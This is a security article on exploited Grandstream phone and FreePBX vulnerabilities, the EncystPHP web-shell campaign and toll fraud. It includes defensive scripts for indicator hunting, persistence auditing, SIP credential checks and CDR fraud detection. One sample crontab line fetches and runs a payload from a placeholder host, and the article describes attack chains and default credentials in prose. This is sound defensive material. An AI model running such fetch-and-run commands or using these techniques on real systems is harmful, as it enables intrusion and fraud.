Two distinct threads run through recent VoIP security incidents. The first is device-level exploitation — vulnerabilities in hardware endpoints like desk phones that allow unauthenticated attackers to execute code and intercept calls. The second is platform-level exploitation — attacks against PBX management software like FreePBX that let adversaries take over the telephony infrastructure entirely and monetize it through toll fraud or use it as a foothold for broader network access. Both threads have produced critical vulnerabilities with active exploitation in the past several months.
CVE-2026-2329: Unauthenticated RCE in Grandstream GXP1600 Phones
In February 2026, Rapid7 researcher Stephen Fewer disclosed a critical stack-based buffer overflow in the entire Grandstream GXP1600 series of VoIP desk phones. The vulnerability, tracked as CVE-2026-2329 with a CVSSv4 score of 9.3, allows an unauthenticated remote attacker to achieve root-level code execution on any affected device. All six models in the series are vulnerable: the GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.
The flaw originates in the device's web-based API service, accessible at the /cgi-bin/api.values.get endpoint, which is reachable in the default configuration without requiring credentials. The endpoint processes a colon-delimited request parameter to return configuration values like firmware version or device model. Due to improper bounds checking, a specially crafted value for this parameter can write past the boundary of a 64-byte stack buffer, overflowing into adjacent stack memory. An attacker who controls what gets written to that overflow can corrupt the stack and ultimately redirect execution — a classic but effective technique that Rapid7 demonstrated by building a full ROP (return-oriented programming) chain to execute arbitrary OS commands via the standard C library system() function.
Rapid7 has released public Metasploit exploit modules for CVE-2026-2329, including a post-exploitation module that extracts stored SIP credentials from a compromised device. Any organization running unpatched GXP1600 phones with the management interface reachable — from the internet or from within an internal network — should treat this as immediately exploitable. Firmware version 1.0.7.81 or later is required to remediate.
What makes this more than a typical endpoint vulnerability is the post-exploitation capability. Once root access is established, an attacker can reconfigure the phone to register with a malicious SIP proxy rather than the organization's legitimate PBX. All calls through that device then route through attacker-controlled infrastructure — effectively wiretapping the endpoint. SIP credentials stored on the device are also extractable, and those credentials can be used to register additional extensions or make outbound calls through the organization's trunks.
The GXP1600 line is widely deployed in small offices and enterprise environments. These phones are typically treated as trusted corporate infrastructure, rarely scrutinized by endpoint security tooling, and often remain in service for years without firmware updates. Because the management API is enabled by default and the vulnerability requires no credentials, any device that is directly internet-exposed or reachable from a compromised network segment is at risk. Rapid7 noted that while exploitation is not trivial, the public availability of weaponized Metasploit modules meaningfully lowers the barrier for opportunistic attacks.
FreePBX Under Active Siege: Two CVEs, Hundreds of Compromises
While the Grandstream vulnerability targets individual endpoints, the attacks against FreePBX infrastructure over the past several months have been both broader in scope and more directly monetized. Two critical vulnerabilities in FreePBX — CVE-2025-57819 and CVE-2025-64328 — have been actively exploited by threat actors, with confirmed compromises numbering in the hundreds as of early 2026.
CVE-2025-57819: Authentication Bypass to RCE (CVSS 10.0)
CVE-2025-57819 carries a maximum severity CVSS score of 10.0. The vulnerability stems from insufficient sanitization of user-supplied input in FreePBX's commercial endpoint module, which allows unauthenticated access to the FreePBX administrator interface. Once inside, an attacker can chain this with a SQL injection flaw to achieve remote code execution on the underlying server. FreePBX versions 15, 16, and 17 are all affected.
Exploitation was observed in the wild before the patch was publicly available, with Sangoma tracing unauthorized access to systems going back to at least August 21, 2025 — specifically targeting internet-exposed installations without adequate IP filtering or access control lists. The U.S. Cybersecurity and Infrastructure Security Agency added CVE-2025-57819 to its Known Exploited Vulnerabilities catalog and required Federal Civilian Executive Branch agencies to remediate by September 19, 2025.
FreePBX (and other PBX platforms) have long been a favorite hunting ground for ransomware gangs, initial access brokers and fraud groups abusing premium billing. If you use FreePBX with an endpoint module, assume compromise. — watchTowr CEO Benjamin Harris
Forensic analysis by watchTowr Labs found that successful exploitation was used to drop web shells and a bash cleanup script designed to erase evidence of compromise. Indicators of compromise to check for include suspicious POST requests to modular.php in Apache logs, calls to extension 9998 in Asterisk CDRs, and unknown users in the ampusers database table.
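Two of the indicators just listed can be checked mechanically from a copy of the Apache access log and a dump of the ampusers table. The script below is an added example written for this article, not Sangoma, watchTowr or FreePBX code: it matches POST requests to modular.php in combined-format log lines and diffs the ampusers usernames against a baseline you supply. The log lines, the baseline and the table contents are constructed sample data, and the in-memory SQLite table only stands in for the real MySQL/MariaDB ampusers table.

```python
"""Hunt for two CVE-2025-57819 indicators: POST requests to modular.php in
Apache access logs and unexpected rows in the FreePBX ampusers table.
Added example for this article; the log lines and table rows are constructed."""
import re
import sqlite3

# Apache combined log format. Constructed sample lines: the two POSTs to
# modular.php from 203.0.113.10 model the indicator watchTowr described.
APACHE_LOG = """\
203.0.113.10 - - [21/Aug/2025:03:14:07 +0000] "POST /admin/modular.php HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.0.2.25 - - [21/Aug/2025:08:02:11 +0000] "GET /admin/config.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.10 - - [21/Aug/2025:03:14:09 +0000] "POST /admin/modular.php HTTP/1.1" 200 77 "-" "python-requests/2.31"
192.0.2.25 - - [21/Aug/2025:08:05:43 +0000] "POST /admin/ajax.php?module=core HTTP/1.1" 200 128 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def find_modular_posts(log_text):
    """Return (client_ip, timestamp, status) for every POST to modular.php."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]   # drop the query string
        if m.group("method") == "POST" and path.endswith("/modular.php"):
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status"))))
    return hits


def find_unknown_ampusers(conn, known_users):
    """Return ampusers usernames that are not on the known-administrator list."""
    rows = conn.execute("SELECT username FROM ampusers").fetchall()
    return sorted(u for (u,) in rows if u not in known_users)


def build_sample_ampusers():
    """In-memory stand-in for the ampusers table (constructed rows; a real
    audit would query the FreePBX asterisk database instead)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ampusers (username TEXT PRIMARY KEY, sections TEXT)")
    conn.executemany(
        "INSERT INTO ampusers VALUES (?, ?)",
        [("admin", "*"), ("helpdesk", "core"), ("sysadm1n", "*")],
    )
    return conn


if __name__ == "__main__":
    for ip, ts, status in find_modular_posts(APACHE_LOG):
        print(f"modular.php POST from {ip} at {ts} (HTTP {status})")
    print("unknown ampusers:",
          find_unknown_ampusers(build_sample_ampusers(), {"admin", "helpdesk"}))
```

Any hit from find_modular_posts() deserves a look at the full request body and at what the same client IP did afterwards; a username that find_unknown_ampusers() reports is an administrator someone other than you created.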
CVE-2025-64328: Command Injection and the EncystPHP Campaign
The second major FreePBX vulnerability, CVE-2025-64328, is a post-authentication command injection flaw in the Endpoint Manager module's check_ssh_connect() function. Authenticated attackers can execute arbitrary shell commands as the asterisk user through this endpoint. Because it requires authentication, it rates below CVE-2025-57819 in severity, but threat actors have chained it with credential attacks or previously compromised accounts to escalate access.
A campaign exploiting CVE-2025-64328, active since at least December 2025, was attributed to INJ3CTOR3, a financially motivated group with a documented history of targeting VoIP infrastructure going back to 2020. The group's goal is consistent across campaigns: gain persistent access to PBX systems and generate revenue through unauthorized call generation and toll fraud. Their tool of choice in this campaign is a PHP web shell dubbed EncystPHP, which masquerades as a legitimate FreePBX file named ajax.php.
EncystPHP implements a four-stage persistence mechanism using crontab entries that re-download the secondary dropper every minute and deploy additional web shells across multiple directories under /var/www/html/ — including digium_phones/, rest_phones/, phones/, and freepbxphones/. Simply removing the initial web shell is insufficient for remediation. Assume full rebuild from clean backup is required.
Once deployed, EncystPHP provides an interactive command interface with predefined functions for enumerating the file system, querying active Asterisk channels, listing SIP peers, and retrieving FreePBX and Elastix configuration files. It also modifies system configuration to ensure SSH port 22 remains open. The web shell authenticates operators via MD5-hashed passwords hardcoded into the shell. By February 2026, Shadowserver and Fortinet had confirmed over 900 unique FreePBX instances compromised by this campaign, with the largest concentrations in the United States, Brazil, Canada, Germany, and France.
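The persistence pattern described above (planted PHP files under the phone-module directories plus a crontab entry that re-fetches the dropper every minute) can be audited from the defender's side with a file-system and crontab sweep. The following is an added example written for this article, not Fortinet, Shadowserver or FreePBX code. It compares the PHP files under the named web-root directories against a baseline list taken from a known-clean installation, and flags crontab lines that run every minute and pipe a download into a shell. The directory tree, the baseline and the crontab text are constructed for the demonstration; in a real audit you would point audit_webroot() at /var/www/html and feed audit_crontab() the output of `crontab -l` for the asterisk and root users.

```python
"""Audit a FreePBX web root and crontab for EncystPHP-style persistence.
Added example for this article; the tree, baseline and crontab are constructed."""
import os
import re
import tempfile

# Directories the campaign is reported to drop web shells into.
WATCHED_DIRS = ("admin", "digium_phones", "rest_phones", "phones", "freepbxphones")

# A crontab entry with five bare asterisks runs every minute; pair that with a
# download piped straight into a shell and you have the re-fetch behaviour.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(?P<cmd>.+)$")
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def audit_webroot(root, baseline):
    """Return PHP files under the watched directories whose path relative to
    root is not in the baseline set built from a known-clean install."""
    findings = []
    for sub in WATCHED_DIRS:
        for dirpath, _, files in os.walk(os.path.join(root, sub)):
            for name in files:
                if not name.endswith(".php"):
                    continue
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                if rel not in baseline:
                    findings.append(rel)
    return sorted(findings)


def audit_crontab(text):
    """Return crontab lines that run every minute and fetch-and-execute."""
    flagged = []
    for line in text.splitlines():
        m = EVERY_MINUTE.match(line.strip())
        if m and FETCH_AND_RUN.search(m.group("cmd")):
            flagged.append(line.strip())
    return flagged


def build_sample_tree():
    """Constructed web root: the legitimate admin/ajax.php and admin/config.php
    plus two planted copies of ajax.php in the phone-module directories."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel in ("admin/ajax.php", "admin/config.php",
                "digium_phones/ajax.php", "rest_phones/ajax.php"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // sample file\n")
    return root


# Baseline for the constructed tree (a real baseline comes from a clean install).
SAMPLE_BASELINE = {"admin/ajax.php", "admin/config.php"}

# Constructed crontab: two benign jobs and one every-minute fetch-and-run entry
# with a placeholder host, not a real campaign URL.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/nightly-backup.sh
* * * * * curl -s http://placeholder.invalid/stage2 | sh
*/5 * * * * /usr/local/bin/health-check.sh
"""

if __name__ == "__main__":
    root = build_sample_tree()
    print("unexpected PHP files:", audit_webroot(root, SAMPLE_BASELINE))
    print("suspicious crontab lines:", audit_crontab(SAMPLE_CRONTAB))
```

The baseline is the important input: FreePBX ships its own ajax.php under admin/, so a name match alone proves nothing, while the same file name appearing under digium_phones/ or rest_phones/ is exactly what the campaign does. As the text says, a positive result is grounds for rebuilding from a clean backup rather than deleting the files found.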
The Toll Fraud Business Model
Understanding why VoIP and PBX infrastructure is such a persistent target requires understanding toll fraud as a business. The Communications Fraud Control Association estimates global telecom fraud losses exceed $38 billion annually, with PBX exploitation accounting for a substantial portion of that figure. When attackers compromise a PBX system, the immediate monetization path is simple: use the organization's SIP trunks to place high volumes of calls to international premium-rate numbers that generate per-minute revenue for the attacker, billed directly to the victim organization.
A compromised PBX can generate $10,000 to $100,000 or more in fraudulent call charges over a single weekend. The timing is not accidental — attackers specifically target Friday evening through Monday morning when IT staff are unavailable to respond. By Monday, the bill is already substantial and often non-reversible. Carriers generally hold the account holder liable for charges generated by their own SIP credentials, regardless of whether those credentials were stolen.
The standard attack sequence for toll fraud starts with automated SIP scanning tools — SIPVicious, Sippts, and similar utilities — probing IP ranges for services on port 5060. Upon finding a SIP service, these tools attempt credential brute-forcing using common defaults: 100/100, 1001/1001, admin/admin, extension numbers used as passwords, and voicemail PINs reused as SIP credentials. Weak or default credentials are typically cracked within minutes on internet-exposed systems.
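Since the credential patterns above are exactly what scanners try first, the useful defensive step is to audit your own extension table for them before a scanner does. The following is an added example for this article, not SIPVicious, Sippts or FreePBX code. It checks each extension's SIP secret against the patterns named in the text (secret equal to the extension number, the well-known default pairs, the voicemail PIN reused as the secret) and adds two checks the text implies but does not spell out: all-numeric secrets and one secret shared across extensions. The extension records and the 16-character minimum are constructed assumptions.

```python
"""Audit SIP extension credentials for the weak patterns that automated SIP
scanners try first. Added example for this article; records are constructed."""

DEFAULT_PAIRS = {("100", "100"), ("1001", "1001"), ("admin", "admin")}
MIN_SECRET_LENGTH = 16   # assumption; FreePBX generates longer secrets by default


def weak_credential_reasons(extension, secret, voicemail_pin=None):
    """Return the reasons one SIP credential is weak; an empty list passes."""
    reasons = []
    if (extension, secret) in DEFAULT_PAIRS:
        reasons.append("well-known default pair")
    if secret == extension:
        reasons.append("secret equals extension number")
    if voicemail_pin is not None and secret == voicemail_pin:
        reasons.append("secret reuses voicemail PIN")
    if secret.isdigit():
        reasons.append("all-numeric secret")
    if len(secret) < MIN_SECRET_LENGTH:
        reasons.append(f"shorter than {MIN_SECRET_LENGTH} characters")
    return reasons


def audit_extensions(records):
    """records: dicts with extension, secret and optional voicemail_pin.
    Returns {extension: [reasons]} for every failing extension, including a
    'secret shared with ...' reason when two extensions use the same secret."""
    findings = {}
    by_secret = {}
    for rec in records:
        ext, sec = rec["extension"], rec["secret"]
        reasons = weak_credential_reasons(ext, sec, rec.get("voicemail_pin"))
        by_secret.setdefault(sec, []).append(ext)
        if reasons:
            findings[ext] = reasons
    for exts in by_secret.values():
        if len(exts) > 1:
            for ext in exts:
                others = ",".join(e for e in exts if e != ext)
                findings.setdefault(ext, []).append("secret shared with " + others)
    return findings


# Constructed extension records; 1001 and 1002 show the scanner-friendly
# patterns, 1003 and 1004 show a strong secret that was copied between phones.
SAMPLE_EXTENSIONS = [
    {"extension": "1001", "secret": "1001", "voicemail_pin": "4321"},
    {"extension": "1002", "secret": "4321", "voicemail_pin": "4321"},
    {"extension": "1003", "secret": "hB7!pQz2vLm9xR4t", "voicemail_pin": "9911"},
    {"extension": "1004", "secret": "hB7!pQz2vLm9xR4t", "voicemail_pin": "2025"},
]

if __name__ == "__main__":
    for ext, reasons in sorted(audit_extensions(SAMPLE_EXTENSIONS).items()):
        print(ext, "->", "; ".join(reasons))
```

Run this against an export of your extension secrets rather than against the live PBX, and rotate anything it flags together with the corresponding voicemail PIN; a rotated secret that still equals the old PIN has not fixed the reuse.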
Beyond immediate toll fraud, a compromised PBX offers additional value to attackers. SIP credentials extracted from the system can be sold to other actors. The server itself, typically well-connected with stable internet access, can serve as a pivot point into internal network segments. And because PBX systems often bridge otherwise segmented networks — routing calls between internal extensions and external trunks — they represent a natural lateral movement opportunity for actors with broader infrastructure goals.
Why VoIP Infrastructure Stays Vulnerable
Several structural factors keep VoIP and PBX systems persistently exposed. Hardware endpoints like the Grandstream GXP1600 series are deployed with a multi-year lifecycle in mind. Organizations purchase phones expecting them to remain in service for five to ten years, and firmware update processes are rarely as mature as patch management for servers or workstations. Many organizations have no automated mechanism to identify when new firmware is available for deployed VoIP hardware, and updating phone firmware often requires physical or network access to individual devices at scale.
On the software side, PBX platforms like FreePBX are frequently deployed by managed service providers or small IT teams who stand up a system and leave it running with minimal ongoing maintenance. Internet-exposed FreePBX installations without IP filtering or access control lists are common — this was explicitly cited as the attack vector for CVE-2025-57819. FreePBX's administrative interface is powerful by design, managing everything from SIP trunks and call routing to voicemail and dial plans, which makes it an attractive target precisely because a successful compromise delivers full control over the organization's telephony infrastructure.
The trusted-device problem compounds this. VoIP phones typically sit on the same network segments as other corporate devices. They appear in IP address space as known-good infrastructure. Endpoint security agents are not deployed on them. Network monitoring may not scrutinize their traffic with the same intensity applied to workstations. An attacker with a foothold on a compromised VoIP phone or PBX server is operating from a position that many security controls are not designed to detect or constrain.
Hardening Priorities for VoIP Infrastructure
- Patch firmware on hardware endpoints immediately. CVE-2026-2329 in the Grandstream GXP1600 series is remediated by firmware version 1.0.7.81. Public Metasploit modules are available, making exploitation straightforward for any attacker who can reach the management interface. If devices cannot be patched immediately, firewall access to the management port and restrict reachability to authorized management stations only.
- Restrict the FreePBX administrative interface to known IP ranges. Both CVE-2025-57819 and CVE-2025-64328 were exploited through internet-exposed FreePBX instances lacking IP filtering. The administrative interface should never be directly internet-accessible. If remote administration is required, require VPN authentication first.
- Audit for indicators of EncystPHP and related web shell compromise. For any FreePBX installation that was internet-exposed before patching CVE-2025-64328, check for unexpected PHP files in /var/www/html/admin/, /var/www/html/digium_phones/, /var/www/html/phones/, and related directories. Review crontab entries for anything unexpected. Verify no unknown users exist in the ampusers database table. Review Asterisk CDRs for calls to extension 9998 or unexplained international call traffic.
- Enforce strong, unique SIP credentials on all extensions. Extension credentials should never match extension numbers, use default values, or reuse voicemail PINs. Automated SIP scanning tools will try these patterns within minutes of discovering an exposed SIP service. Implement account lockout or rate limiting on failed SIP registration attempts where the platform supports it.
- Monitor for anomalous call activity, particularly outside business hours. Toll fraud attacks concentrate on weekend and holiday periods when monitoring is reduced. Automated alerts on after-hours international dialing, high call volumes, or calls to unfamiliar country codes provide detection coverage where manual monitoring cannot. Set hard outbound call limits or block international dialing entirely for extensions where it is not a business requirement.
- Segment VoIP infrastructure from general corporate networks. Place VoIP phones and PBX servers in dedicated VLANs with firewall policies limiting communication to required SIP and RTP traffic. A compromised VoIP device should not have direct access to file servers, domain controllers, or other sensitive internal resources.
- Monitor VoIP device outbound connections. After CVE-2026-2329, a compromised Grandstream phone may attempt to register with an unexpected SIP server. Monitoring for outbound SIP REGISTER messages to IP addresses outside the organization's known SIP trunk providers can surface this quickly. Similarly, unexpected SSH connections from PBX servers should be treated as a red flag given EncystPHP's modification of SSH configuration.
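The CDR-based checks in the list above (calls to extension 9998, after-hours international dialing, high call volumes, unfamiliar country codes) can be expressed as a handful of rules over exported CDR rows. The script below is an added example for this article, not Asterisk or FreePBX code. It reads a constructed subset of CDR fields (src, dst, start, billsec, disposition), classifies international destinations by country code under the assumption of a NANP dial plan where 011 prefixes international calls, and raises an alert per rule. The business-hours window, the allowed country codes, the per-hour volume threshold and the small country-code table are assumptions to tune per site; the sample rows model a weekend burst from one extension to a single foreign range.

```python
"""Flag toll-fraud signals in Asterisk CDR rows: calls to 9998, after-hours
international calls, destinations outside the allowed country codes, and
per-extension call bursts. Added example for this article; CDR rows,
thresholds and the country-code table are constructed assumptions."""
import csv
import io
from collections import defaultdict
from datetime import datetime

BUSINESS_HOURS = range(8, 18)          # 08:00-17:59, Monday to Friday (assumption)
ALLOWED_COUNTRY_CODES = {"1", "44"}    # where this site legitimately calls (assumption)
MAX_CALLS_PER_HOUR = 20                # per source extension (assumption)
SUSPICIOUS_EXTENSION = "9998"
COUNTRY_CODES = ("1", "7", "44", "49", "55", "62", "252", "371")  # small subset

# Constructed CDR subset: columns chosen from the Asterisk CDR fields.
SAMPLE_CDR = """\
src,dst,start,billsec,disposition
1001,9998,2026-02-14 02:11:03,12,ANSWERED
1001,0116281234567,2026-02-14 02:12:40,340,ANSWERED
1002,0114412079460000,2026-02-13 10:15:00,95,ANSWERED
1003,01125212345678,2026-02-14 03:00:12,600,ANSWERED
1003,01125212345679,2026-02-14 03:02:19,598,ANSWERED
"""


def load_cdrs(text):
    """Parse CSV CDR rows, converting start to datetime and billsec to int."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        r["start"] = datetime.strptime(r["start"], "%Y-%m-%d %H:%M:%S")
        r["billsec"] = int(r["billsec"])
        rows.append(r)
    return rows


def country_code(dst):
    """Country code of an internationally dialled number, None for domestic,
    'unknown' when the code is not in the table. Longest match first so that
    252 is not mistaken for a code starting with 2."""
    if not dst.startswith("011"):
        return None
    rest = dst[3:]
    for n in (3, 2, 1):
        if rest[:n] in COUNTRY_CODES:
            return rest[:n]
    return "unknown"


def outside_business_hours(ts):
    return ts.weekday() >= 5 or ts.hour not in BUSINESS_HOURS


def analyze(cdrs):
    """Return {rule: [(src, dst-or-count, when), ...]} for every rule that fired."""
    alerts = defaultdict(list)
    per_hour = defaultdict(int)
    for r in cdrs:
        key = (r["src"], r["dst"], r["start"].isoformat(sep=" "))
        if r["dst"] == SUSPICIOUS_EXTENSION:
            alerts["call to 9998"].append(key)
        cc = country_code(r["dst"])
        if cc is not None:
            if cc not in ALLOWED_COUNTRY_CODES:
                alerts["unallowed country code " + cc].append(key)
            if outside_business_hours(r["start"]):
                alerts["after-hours international"].append(key)
        per_hour[(r["src"], r["start"].replace(minute=0, second=0))] += 1
    for (src, hour), n in per_hour.items():
        if n > MAX_CALLS_PER_HOUR:
            alerts["high volume"].append((src, f"{n} calls", hour.isoformat(sep=" ")))
    return dict(alerts)


def build_sample():
    """SAMPLE_CDR plus 25 constructed calls from 1003 within the same hour,
    modelling a weekend burst to one foreign number range."""
    extra = "".join(
        f"1003,0112521234{5700 + i:04d},2026-02-14 03:{10 + i:02d}:00,590,ANSWERED\n"
        for i in range(25)
    )
    return load_cdrs(SAMPLE_CDR + extra)


if __name__ == "__main__":
    for rule, events in sorted(analyze(build_sample()).items()):
        print(f"{rule}: {len(events)} event(s), first {events[0]}")
```

The 1002 call to a UK number during Friday business hours raises nothing, which is the point of an allowlist plus a time window rather than blocking all international traffic; the 1003 burst trips three rules at once, and that overlap is what should page someone on a Saturday morning rather than wait for Monday's invoice.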
Key Takeaways
- Two critical vulnerabilities in widely deployed VoIP infrastructure are actively exploited right now. CVE-2026-2329 in Grandstream phones (CVSS 9.3) and CVE-2025-64328 in FreePBX, combined with the earlier CVE-2025-57819 (CVSS 10.0), represent a concentrated set of high-severity issues that have moved from disclosure to active exploitation quickly. Patching and mitigation cannot wait.
- Toll fraud provides attackers with immediate, direct monetization from a compromised PBX. Unlike data theft, which requires a downstream sale, unauthorized call generation starts generating revenue for attackers the moment they have SIP trunk access. Weekend attacks can produce five-figure losses before anyone notices. Financial exposure is real and immediate.
- VoIP hardware and PBX software share a structural patching problem. Multi-year device lifecycles, minimal update automation, and internet-exposed management interfaces create persistent attack surface. The same attack patterns — unauthenticated access to management endpoints, SIP credential brute-forcing, and web shell persistence — recur across campaigns because the conditions that enable them are rarely addressed at the root.
- A compromised PBX is not just a telephony problem — it's a network foothold. PBX servers bridge network segments, carry SIP credentials, and operate with elevated trust from surrounding infrastructure. Initial access through VoIP exploitation can enable lateral movement that extends well beyond the phone system.
- Detection for VoIP exploitation requires VoIP-specific monitoring. General endpoint security does not cover VoIP phones. PBX-specific indicators — CDR anomalies, unexpected SIP registrations, new administrative users, and unusual file system changes — require deliberate monitoring that many organizations have not implemented.
VoIP infrastructure rarely gets the security attention that servers, workstations, and network devices receive. The cluster of critical vulnerabilities and active campaigns from the past several months is a useful reminder that phones are networked computers with privileged access to both communications and internal network segments. The organizations that treat them as such — maintaining firmware, restricting management access, and monitoring call activity — are in a significantly stronger position than those that don't.